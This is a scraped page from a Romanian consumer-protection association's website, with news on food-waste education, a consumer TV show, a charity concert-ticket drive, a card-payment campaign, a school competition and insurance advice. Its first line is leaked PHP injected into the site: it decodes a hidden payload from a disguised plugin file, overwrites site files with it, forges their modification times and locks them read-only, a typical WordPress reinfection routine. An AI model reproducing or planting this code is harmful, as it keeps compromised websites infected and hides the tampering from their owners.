$wp_update_file="/home/shuffles/public_html/wp-content/plugins/helloworld.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } O noua atitudine - Un site de educare si informare in domeniul protectiei consumatorilor, protectiei mediului, contrafacerii si pirateriei

Reducerea risipei alimentare într-o nouă etapă!!!

respect-mancarii

ROMÂNII S-AU INFORMAT CEL MAI MULT DESPRE REDUCEREA RISIPEI ALIMENTARE

România este campioana utilizării materialelor educative video promovate de InfoCons pe tema reducerii risipei alimentare, în cadrul proiectului european “Global learning approach on food waste in non formal education”. Evaluarea testelor, ponturilor, animațiilor și jocului s-a derulat în perioada 21.10.2019 – 03.12.2020.

România și Lituania domină statisticile, ca număr de utilizatori/vizitatori ai materialelor. România ocupă prima poziție la 8 din cele 11 materiale video educative, 3 locuri 1 revenind Lituaniei. Statistica include cele 7 state participante la proiect: România, Bulgaria, Croația, Lituania, Letonia, Estonia și Bangladesh. 

Din totalul de 42.829 utilizatori ai testelor, 40% provin din România, urmată de Lituania cu 28% utilizatori. Cel mai frecventat dintre cele 3 teste a fost ”Călătoria bananei” (45.5%  din totalul utilizatorilor), cu România pe primul loc (47%) și Lituania pe poziția secundă (23.5%).  

//vartotojai.lt/sincerelyfood/test/banana/ 

La categoria animație video  – cu trei ”Povești din bucătărie” (33.744 vizualizări)  – conduce România (37.8%) urmată de Lituania (29.5%). Povestea albinelor s-a plasat pe primul loc (40% vizualizări).

//www.infocons.ro/ro/i-povesti-de-bucatarie-albinele-MjE1NjQtOTU.html

Cele 4 ponturi oferite au înregistrat 38.756 vizitatori impresionant de vizitatori, din care 40% pentru România și 23% pentru Lituania. Congelarea corectă a alimentelor a atras cel mai mare număr de privitori (30%) //www.infocons.ro/ro/i-sfaturi-utile-congelarea-corecta-a-alimentelor-MjEzNzItOTU.html 

Singurul joc, intitulat ”Eroul de zi cu zi”, a adunat  4570 de utilizatori,   32% de utilizatori din România și 25% din Lituania.
ue

Reîncepe emisiunea SuperConsumatorul

Astăzi, 14 Octombrie 2015, începând cu orele 18:00, pe postul de televiziune TVR1, reîncepe emisiunea „SuperConsumatorul” ce va putea fi urmărită în fiecare miercuri de la ora 18:00, având ca invitat permanent al emisiunii pe domnul Sorin Mierlea, Președintele InfoCons.

SuperConsumatorul este o emisiune informativă despre drepturile cumpărătorilor în calitatea lor de consumatori, pentru ca aceștia să aibă o atitudine activă, să aibă acces la o informație corectă, transparentă, independentă, și astfel să devenim cu toții consumatori europeni care să-și cunoască cu adevărat drepturile și să ni le și revendicăm.

În cadrul emisiunii de astăzi vor fi dezbătute următoarele teme:

  • Plata cu cardul – un mijloc de plată normal pentru o achiziție sigură dar și pentru o reclamație eficientă
  • Fluctuațiile de energie electrică – o problemă reală?
  • Cum să ne alegem pâinea de fiecare zi

Temele vor fi dezbătute live, cu invitați de marcă din fiecare domeniu.

Emisiunea își propune ca fiecare dintre să adoptăm o9atitudine!

Sorin Mierlea – președinte InfoCons

 

InfoCons (www.infocons.ro), unica organizație din România cu drepturi depline în Consumers International, este o asociație de consumatori neguvernamentală, reprezentativă, de drept privat, fără scop lucrativ, cu patrimoniu distinct și indivizibil, independentă, întemeiată pe principii democratice, ce apără drepturile consumatorilor – membră fondatoare a Federației Asociațiilor de Consumatori.

Fii informat! Ia atitudine! Cunoaște-ți drepturile și exercita-le apelând 021 9615!

“Participa la eveniment si ai sansa sa daruiesti bucurie, cu o 9atitudine!”

Sub egida Campaniei „ Si eu sunt cetatean european si am drepturi!” demarata de Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania- InfoCons, dam o sansa tuturor, printr-o 9atitudine pentru cultura persoanelor cu deficiente de vedere.  Astfel, vor avea ocazia sa participe la acest unic eveniment, gratie parteneriatului intre InfoCons si Laishoo International Development & Consulting SRL care va oferi cu titlu gratuit, ca invitatie, 5 bilete la unul dintre concertele ANDRE RIEU de la Bucuresti,  pentru fiecare 100 bilete vandute.

Prin acest Proiect Social vom informa asupra acestei actiuni toti partenerii nostri, Asociatiile Patronale, Organizatiile Sindicale, Institutiile publice din Romania, Centrele de Business, Institutiile de Cercetare din cadrul Academiei Romane, Camerele de Comert bilaterale, Ambasade, etc. prin adresa directa.

De asemenea, informatiile despre acest eveniment cultural deosebit dar si despre acest Proiect Social se vor posta pe site-urile organizatiei InfoCons: www.teste-comparative.ro; www.infocons.rowww.o9atitudine.ro;  e.infocons.ro;  cazare.infocons.ro; www.finformation.ro; sanatate.o9atitudine.ro; protectio.orgwww.marca-increderii.ro; Semnalistica.InfoCons.RO;

André Rieu – Maestrul

Nascut in Maastricht, Olanda, intr-o familie de muzicieni, André Rieu este cel mai de succes violonist din lume și cel mai bine vandut muzician clasic din toate timpurile. Detine cea mai mare orchestra privata din lume și a vândut mai mult de 40 de milioane de albume și DVD-uri. Lansarea sa internationala a venit în 1994 cu CD-ul “Strauss & Co”. De atunci, a primit mai mult de 400 Platinum și 171 de Gold Awards. Are mai mult de 1,2 milioane de fani pe Facebook. In concertele sale, interpreteaza cele mai frumoase valsuri de Johann Strauß sau Franz Lehár, hit-uri de renume mondial din musicaluri si filme, cele mai iubite arii de opera si opereta, precum și muzică populară din toate decadele.
André a fost denumit “Regele Valsului”. “Johann Strauss este compozitorul meu preferat din toate timpurile.”
In concertele sale, André canta la vioara, dirijeaza orchestra lui
și este un “conférencier” fermecător, care va interactiona cu publicul dupa fiecare piesa.

André canta la o vioară construită de Stradivarius in 1732. “Îmi place acest instrument. Îmi amintește de cantareata de opera Maria Callas – foarte pasionala”.

André Rieu – The Entertainer

În fiecare an, André si a lui Johann Strauss Orchestra, cor si solisti internationali sustin aproximativ 100 de concerte peste tot in lume, in fata a peste 1 milion de oameni. Turneele sale au fost prezente in Billboard Top 10 în ultimii zece ani. Spectacolele lui André te vor face sa razi, sa plangi si sa dansezi. Concerte sale nu sunt asemenea concertelor clasice rigide cu care esti obisnuit. Fii pregatit pentru o seara plina de distractie!

André Rieu – Omul de afaceri

André traieste si lucreaza in Maastricht. Compania sa este numita “André Rieu Productions”. 120 de angajați lucrează pentru André în mod constant la care se adauga alti 100 de colaboratori în turnee. Membrii orchestrei sale provin din zece tari. André are studio propriu de înregistrare, agentie de turism, o gradinita pentru copiii membrilor orchestrei, propriile autobuze (construit de Mercedes Benz) si detine un atelier complet in care se fac costumele pentru concertele sale. Compania detine patru seturi complete de scena, instrumente, costume etc .. Andre si orchestra calatoresc cu o echipa intreaga de bucatari, medici și antrenor de fitness.

André Rieu – Omul de familie

Pentru André Rieu, familia este cel mai important factor în succesul lui. Este casatorit de 40 de ani cu Marjorie, o fosta profesoara de germană și italiană. Cuplul are doi fii, Marc (care este pictor) și Pierre (care este vicepreședinte al André Rieu Productions). André si Marjorie au patru nepoti, dintre care trei au inceput deja sa studieze vioara.
“Întotdeauna am vrut sa ma casatore
șc cu o femeie pe care nu numai ca o iubesc, dar cu care as putea lucra împreună. Fără Marjorie, visul meu nu s-ar fi realizat: Sa calatoresc în lumea intreaga cu propria mea orchestră. Și pentru aceasta voi fi mereu recunoscător.” André  

Participa la eveniment si ai sansa sa daruiesti bucurie, cu o 9atitudine! - ANDRE RIEU - InfoCons

“Take part in the event and you have the chance to bring joy, with a new attitude!”

Under the Campaign auspices “I am an European citizen and I have rights!” initiated by the National Association for Consumer Protection and Promotion of Programs and Strategies from Romania-InfoCons, we give a chance to all through “a new attitude for culture” for persons with visual disabilities. Thus, they will have the opportunity to participate in this unique event, thanks to the Partnership between InfoCons and Laishoo International Development & Consulting SRL that will provide with gratuity purposes, as invitation at one of Andre Rieu concert in Bucharest, 5 tickets for every 100 tickets sold.

Through this Social Project we will inform about this action all our partners, Employers’ Associations, Trade Unions, Public Institutions in Romania, Business centres, Research Institutions of the Romanian Academy, Bilateral Chambers of Commerce, Embassies, etc. through direct address.

Also, information regarding this special cultural event but also about this Social Project will be encountered on InfoCons organization sites: www.teste-comparative.ro; www.infocons.ro;

www.o9atitudine.ro;  e.infocons.ro;  cazare.infocons.ro; www.finformation.ro; www.dolceta.ro; sanatate.o9atitudine.ro; protectio.orgwww.marca-increderii.ro; Semnalistica.InfoCons.RO

André Rieu – The Musician

A native of Maastricht, Netherlands and born into a musical family, André Rieu is the world’s most successful violinist and best selling classical musician of all times. He owns the biggest private orchestra in the world and has sold more than 40 million albums and DVDs. His breakthrough came in 1994 with the CD “Strauss & Co”. Since then, he has received more than 400 Platinum and 171 Gold Awards. He has more than 1.2 mio Facebook fans. In his concerts he plays the most beautiful waltzes by Johann Strauß or Franz Lehár, world famous hits from musicals and film, the most beloved melodies from opera and operetta as well as popular music of all decades.
André has been dubbed a modern “King of the Waltz”. “Johann Strauß is my favourite composer of all times.”
In his shows, André plays the violin, conducts his orchestra and is a charming “conférencier” who will interact with the audience after every piece.

André plays a violin built by Stradivarius in 1732. “I love this instrument. It reminds me of the opera singer Maria Callas – very passionate.”
André loves to compose. He wrote the famous opening to the “Donna Leon” TV series and much more.

André Rieu – The Entertainer 

Every year, André, his Johann Strauss Orchestra, chorus and international soloists play about 100 concerts all over the world in front of an audience of 1 Million people. His tours have been on Billboard’s Top 10 for the past ten years. André’s shows will make you laugh, weep and dance in the isles. His concerts are not like the stiff classical concerts you may have experienced. Be prepared for an evening full of fun!

André Rieu – The Businessman

André lives and works in Maastricht. His company is called “André Rieu Productions”. 120 employees work for André on a regular basis with about 100 freelancers while on tour. His orchestra members come from ten different nations. André has his own recording studio, travel agency, a kindergarden for the orchestra member’s children, his own busses (built by Mercedes Benz) and owns a complete atelier in which the costumes for his concerts are made. He owns four complete sets of the stage, instruments, costumes etc.. He and his orchestra travel with his own cooks, doctor and fitness trainer.

André Rieu – The Family Man

To André Rieu, his family is the most important factor in his success. He’s been married for 40 years to Marjorie, a former teacher for German and Italian. The couple has two sons, Marc (who is a painter) and Pierre (who is Vice President of André Rieu Productions). André and Marjorie have four little grandchildren, of which three have already started playing the violin.
“I always wanted to marry someone whom I not only loved but with whom I could work together. Without Marjorie my dream would not have come true: To travel the world with my own orchestra. And for this I will always be grateful.” André Rieu

A.N.P.C.P.P.S. Romania – InfoCons a lansat Campania Nationala “Cere bonul fiscal!” sectiunea “Plateste cu cardul!”

A.N.P.C.P.P.S. Romania – InfoCons a lansat ieri, 28 aprilie 2015, Campania Nationala “Cere bonul fiscal!” sectiunea “Plateste cu cardul!”. Plata cu cardul inseamna :  fiscalizarea tranzactiilor atat cele realizate in tara cat si cele din afara granitelor, dar mai ales reducerea posibilitatii aproape de zero de a achizitiona produse contrafacute sau care provin din contrabanda , dar si siguranta cetateanului in calitatea lui de consumator de  achizitonare a unor produse/serviciii provenite dintr-un lant de trasabilitate predictibil, sigur, monitorizat si controlat si nu in ultimul rand in cazul unei deficiente exista dovada justificativa pentru revendicarea daunelor materiale sau morale in cazul unei sesizari.

 

Obiectivul Campaniei este de a constientiza cetatenii in calitatea lor de consumatori europeni cu privire la achizitionarea de PRODUSE SIGURE si cresterea increderii acestora in piata din Romania  tinand cont si de faptul ca majoritatea cetatenilor isi primesc drepturile salariale pe card iar acestia retrag  in proportie covarsitoare aceste sume de la ATM-uri urmand a achizitiona produsele si servicii care pot fi astfel: NEFISCALIZATE, NESIGURE, DINTR-UN LANT FARA A AVEA NICIUN CONTROL ASUPRA ACESTORA SI MAI ALES DE INCREDERE.

Mai multe detalii despre campanie pe site-ul www.plateste-cu-cardul.ro.

A.N.P.C.P.P.S. Romania – InfoCons lanseaza astazi Campania Nationala “Cere bonul fiscal!” sectiunea “Plateste cu cardul!” - Protectia Consumatorilor
Corneliu Visoianu – Consilier al primului ministru, Sorin Mierlea – Presedinte A.N.P.C.P.P.S. Romania – InfoCons, Cosmin Vladimirescu – General manager MasterCard Romania
A.N.P.C.P.P.S. Romania – InfoCons lanseaza astazi Campania Nationala “Cere bonul fiscal!”  sectiunea “Plateste cu cardul!” - Protectia Consumatorilor
Corneliu Visoianu – Consilier al primului ministru, Sorin Mierlea – Presedinte A.N.P.C.P.P.S. Romania – InfoCons, Cosmin Vladimirescu – General manager MasterCard Romania
A.N.P.C.P.P.S. Romania – InfoCons lanseaza astazi  Campania Nationala “Cere bonul fiscal!”  sectiunea “Plateste cu cardul!” - Protectia Consumatorilor6
Corneliu Visoianu – Consilier al primului ministru, Sorin Mierlea – Presedinte A.N.P.C.P.P.S. Romania – InfoCons, Cosmin Vladimirescu – General manager MasterCard Romania
A.N.P.C.P.P.S. Romania – InfoCons lanseaza astazi Campania Nationala “Cere bonul fiscal!”  sectiunea  “Plateste cu cardul!” - Protectia Consumatorilor
Corneliu Visoianu – Consilier al primului ministru, Sorin Mierlea – Presedinte A.N.P.C.P.P.S. Romania – InfoCons

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons (www.protectia-consumatorilor.ro), unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

FII INFORMAT! IA ATITUDINE! – 0219615

18 aprilie 2015 – 18 aprilie 2003 – 12 ani de cand Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons este alaturi de consumatorul roman

18 aprilie 2015 – 18 aprilie 2003

12 ani de cand Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons este alaturi de consumatorul roman, de cand implementeaza campanii si proiecte. Speram ca si pe viitor sa aducem ceva nou de folos fiecarui cetatean.

Multumim celor peste 68.000 de romani care au avut incredere pentru a deveni membrii, multumim tuturor partenerilor care ne-au sprijinit in demersurile noastre si speram sa fim aproape si pe viitor cu aceeasi o9atitudine! 

InfoCons-Protectia-Consumatorilor-Protectia-Consumatoruluio9atitudine-Protectia-Consumatorilor-Protectia-Consumatorului

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons (www.protectia-consumatorilor.ro), unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

 

FII INFORMAT! IA ATITUDINE! – 0219615

Incepe Competitia interscolara 2015

Continutul digital – Distreaza-te si protejeaza-te!

Concursul interscolar Consumer Classroom 2015

Creează o lecție interactivă, un material video sau un joc de rol pe tema folosirii de către tineri a ‘conținutului digital’

Competiţie deschisă şcolilor gimnaziale (elevi între 12 şi 18 ani) din întreaga Uniune Europeană

Data-limită pentru înscrierea la concurs este 24 aprilie 2015, miezul nopții (ora Europei Centrale)

Proiectul Consumer Classroom, susținut de Comisia Europeană, lansează cel de-al treilea concurs anual interșcolar.

Invităm toate şcolile gimnaziale din întreaga Uniune Europeană să participe şi să-şi folosească creativitatea şi munca în echipă pe tema:

Conținutul digital

În prezent, conținutul digital se află pretutindeni: elevii tăi pot să acceseze ușor produse online gratuite sau cu plată, în special muzică, filme, cărți în format electronic și jocuri. Investigând felul în care sunt protejați atunci când accesează sau cumpără conținut digital, vei avea la dispoziție o diversitate de subiecte, *** ar fi protecția datelor cu caracter personal, consecințele folosirii conținutului digital legal și ilegal, vulnerabilitatea consumatorilor tineri, particularitățile fiecărei țări din Europa privind accesul la conținutul digital etc.

În conformitate cu Agenda digitală pentru Europa (o inițiativă din cadrul strategiei Europa 2020), noul președinte al Comisiei Europene, Jean-Claude Juncker, ales în octombrie 2014, a stabilit conținutul digital drept una dintre prioritățile sale principale în vederea creării unei piețe unice digitale . Acest subiect include propunerea CE de elaborare a Directivei COM/2012/010 , care demonstrează dorința puternică de inițiere a negocierilor privind reglementările UE comune pentru protecția datelor.

Stabilirea aspectelor conținutului digital pe care vrei să le explorezi rămâne la latitudinea ta și a clasei partenere. Nu trebuie decât să trimiți o lecție interactivă, o pagină web, un material video sau un joc de rol cu clasa ta parteneră, care să aibă tema „tineri folosind conținut digital”. Nu rata această șansă unică de a-ți descătușa creativitatea!

Acest proiect te va scoate din sala de clasă – va trebui să colaborezi cu altă şcoală europeană! Cu ajutorul instrumentelor de pe site-ul Consumer Classroom, poţi colabora cu o şcoală parteneră din Europa pentru a crea şi împărtăşi o experienţă interculturală a învăţării.

Exercițiul va include trei etape :

  • 1/ inițiază o dezbatere pe tema conținutului digital : ambele clase trebuie să definească semnificația conținutului digital în accepțiunea elevilor și să identifice problemele cu care aceștia se pot confrunta atunci când folosesc diverse tipuri de conținut digital, precum și să propună soluții privind problemele legate de folosirea conținutului digital;
  • 2/ comunică școlii partenere opinia clasei tale : ambele clase vor trebui să compare idei și să afle în urma discuțiilor dacă împărtășesc aceeași experiență, au aceeași percepție și se confruntă cu aceleași probleme, pentru ca la final să propună soluții pentru problemele identificate;
  • 3/ prezintă-ți lucrarea : creează un instrument/suport interactiv (o lecție interactivă, o pagină web, un material video, un joc de rol înregistrat etc.) care să prezinte ideile privind modul în care conținutul digital poate fi folosit în siguranță.

Îți adresăm o invitație călduroasă de a lua parte la concursul nostru pentru a-ți prezenta ideile privind conținutul digital!

 

Care sunt premiile?

Premiul I

O excursie la Bruxelles, în care echipa proiectului va vizita capitala europeană şi principalele instituţii ale Uniunii Europene. Proiectul câștigător va fi prezentat pe site-ul web Consumer Classroom.

Proiectele preselecționate

Opţiunea de a selecta un articol pentru echiparea sălii de clasă/şcolii câştigătorilor.

Următoarele premii

Diplomă de merit emisă de Comisia Europeană pentru participarea la competiție.

 

Care sunt datele importante ale Competiției interșcolare?

  • – înregistrarea echipei de proiect și trimiterea proiectului interșcolar: 20  februarie – 24 aprilie 2015
  • – Preselectarea propunerilor de către o echipă de experţi: 27 aprilie – 4 mai 2015
  • – Sesiunea de votare pentru cele mai bune proiecte interşcolare: 11 – 22 mai 2015
  • unțarea câștigătorului competiției și a rezultatelor: 29 mai 2015

– Prezentare în format Visio al proiectului echipei câștigătoare la Summitul UE pentru consumatori: 1 iunie 2015

Începeți acum!

Accesează //www.consumerclassroom.eu/content/inter-school-competition-2015 și intră în Competiția interșcolară!

Recomandarea ASF către consumatori pentru încheierea poliţelor de asigurare RCA

Autoritatea de Supraveghere Financiară – ASF doreşte să recomande consumatorilor atenţie sporită la achiziţionarea poliţelor de asigurare auto RCA (asigurări obligatorii de răspundere civilă), în scopul prevenirii prejudiciilor cauzate de plata unor poliţe false de asigurare.

ASF consideră riscul contractării unei poliţe RCA false ca fiind la nivel minim, în contextul în care atât la nivelul formularelor tipizate cât şi la nivelul mecanismelor de raportare şi control există suficiente elemente de siguranţă.

Cu toate acestea, consumatorii de asigurări au la rândul lor un rol important  în prevenirea sau descoperirea la timp a unor asemenea cazuri, respectând  anumite măsuri recomandate de către ASF:

Principalele recomandări

  1. Trebuie sa fim atenţi dacă societatea care eliberează aceste poliţe (direct sau prin intermediul brokerilor) este autorizată de ASF în acest scop: doar 11 societăţi sunt autorizate să practice asigurarea RCA, lista acestora fiind disponibilă la următorul link.
  2. Înainte de a semna o poliţă RCA trebuie să verificăm îndeplinirea următoarelor condiţii: la încheierea asigurării obligatorii RCA, asigurătorul este obligat să emită poliţa de asigurare obligatorie de răspundere civilă a vehiculelor (RCA), vigneta, documentul internaţional de asigurare (Cartea Verde), respectiv chitanţa în cazul în care plata se efectuează cu numerar.
  3. Trebuie să verificăm dacă poliţa de asigurare RCA conţine informaţii despre părţile implicate în contract, perioada de valabilitate a asigurării, limitele maxime de despăgubire, prima de asigurare, clasa bonus – malus,  datele tehnice reale ale vehiculului (numărul de înmatriculare / înregistrare, numărul de identificare al vehiculului) conform documentelor de identificare ale acestuia precum şi statele în care acest document are valabilitate, pentru a ne asigura de  corectitudinea datelor din poliţă. Forma şi conţinutul poliţei de asigurare RCA, a documentului internaţional de asigurare precum şi cea a vignetei precum şi caracteristicile tehnice care trebuie îndeplinite pot fi vizualizate la următoarele linkuri: Link 1, Link 2, Link 3.
  4. Consumatorii sunt sfătuiţi să utilizeze, ori de câte ori este necesar, baza de date CEDAM disponibilă pe pagina de internet www.asfromania.ro la următorul link.

Prin accesarea CEDAM, consumatorii pot verifica existenţa în baza de date a poliţei achiziţionate anterior  (dar nu mai devreme de 5 zile de la data încheierii poliţei RCA), precum şi următoarele:

  • existenţa unei poliţe RCA la o anumită dată pentru un anumit vehicul;
  • vizualizarea societăţii de asigurare care a emis poliţa;
  • identificarea prejudiciilor asociate poliţelor valabile începând cu anul 2008.

ASF reaminteşte faptul că RCA este asigurarea obligatorie de răspundere civilă pe baza căreia asigurătorul care a emis poliţa plăteşte despăgubiri terţelor persoane păgubite, în urma unui accident provocat de vehiculul pentru care s-a încheiat poliţa. Asigurarea RCA este obligatorie indiferent dacă se încheie sau nu o asigurare facultativă CASCO pentru acelaşi vehicul.

În lipsa unei poliţe valide, Fondul de protecţie a victimelor străzii va suporta prejudiciile în cazul unui accident, urmând să recupereze sumele acordate drept despăgubire de la persoana vinovată de producerea accidentului. Mai mult, dacă autovehiculul este depistat fără o poliţă RCA valabilă, proprietarul este sancţionat cu amendă.

Pentru evitarea pagubelor provocate de înşelăciunile cu poliţe RCA false şi pentru ca asigurările încheiate să îşi dovedească utilitatea în eventualitatea unor evenimente nedorite, se recomandă parcurgerea paşilor descrişi mai sus.

De asemenea, reamintim faptul că, în data de 24 Octombrie 2013, ASF a adus la cunoştinţa publicului informaţii suplimentare relevante pentru proprietarii de vehicule care au obligaţia încheierii asigurării RCA, disponibile la următorul link.

ASF va continua să publice pe site-ul său recomandări cu caracter preventiv şi încurajează consumatorii de servicii aferente întregii pieţei financiare non-bancare să semnaleze, prin sesizări, orice posibilă neregulă observată.

23-24 martie – conferinta proiect COBALT

In zilele de 23 si 24 martie a avut loc la Bruxelles conferinta “Managementul durabil al materiilor prime din Europa – Promovarea dialogului intre părțile interesate pentru a livra pe viitor” in cadrul proiectului COBALT.

Aceasta este conferința de închidere a proiectului COBALT, un proiect desfasurat pe o perioada de 2 ani, finanțat prin cel de-al 7-lea program-cadru pentru cercetare al Comisiei Europene. COBALT își propune să încurajeze crearea de rețele și schimbul de experienta pentru elaborarea politicilor si intre afaceri și industrie, societatea civilă, mediul academic, precum și furnizarea de studii geologice pentru a promova gestionarea durabilă a materiilor prime în Europa. 

Astfel, proiectul va contribui la crearea unui cadru favorabil pentru punerea în aplicare a parteneriatului european pentru inovare privind materiile prime.

Proiect COBALTProiect_COBALTSorin MierleaGrup de lucru COBALT 1Grup de lucru COBALT 2Grup de lucru COBALT 3Grup de lucru COBALT 4Grup de lucru COBALT 5Grup de lucru COBALT

 

Reprezentantii si voluntarii A.N.P.C.P.P.S. Romania – InfoCons participa la cel mai mare eveniment al iernii, Bucharest Christmas Shopping

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania  – InfoCons, participa in perioada 1 -21.12.2014, la cel mai mare eveniment al iernii, Bucharest Christmas Shopping, ce se desfasoara la ROMEXPO (www.bucharestchristmasshopping.ro).

Reprezentantii si voluntarii A.N.P.C.P.P.S. Romania – InfoCons sunt prezenti  in pavilionul central, standul C17,  unde disemineaza materiale informative – educative realizate in cadrul Campaniei Nationale de Educare si Informare – “o9atitudine!”, pe diferite teme de interes  pentru vizitatori si participanti. Totodata consumatorii pot depunde sesizari in domeniul protectiei consumatorilor, iar agentilor economici expozanti li se va asigura consilierea si consultanta pe teme de protectia consumatorilor.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons (www.protectia-consumatorilor.ro), unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

Fii INFORMAT! IA ATITUDINE – 0219615

Reprezentantii A.N.P.C.P.P.S. Romania – InfoCons sunt prezenti la Targul de Turism al Romaniei – ROMEXPO

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania  – InfoCons, participa in perioada 13 -16.11.2014, la TTRII- Targul de Turism al Romaniei, ce se desfasoara la ROMEXPO ( //www.targuldeturism.ro)

Reprezentantii si voluntarii A.N.P.C.P.P.S. Romania – InfoCons sunt prezenti in pavilionul C3, standul 8C,  unde disemineaza materiale informative – educative realizate in cadrul Campaniei Nationale de Educare si Informare – “o9atitudine!”, pe diferite teme de interes  pentru vizitatori si participanti. Totodata consumatorii pot depunde sesizari in domeniul protectiei consumatorilor, iar agentilor economici expozanti li se va asigura consilierea si consultanta pe teme de protectia consumatorilor.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons (www.protectia-consumatorilor.ro), unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

Fii INFORMAT! IA ATITUDINE – 0219615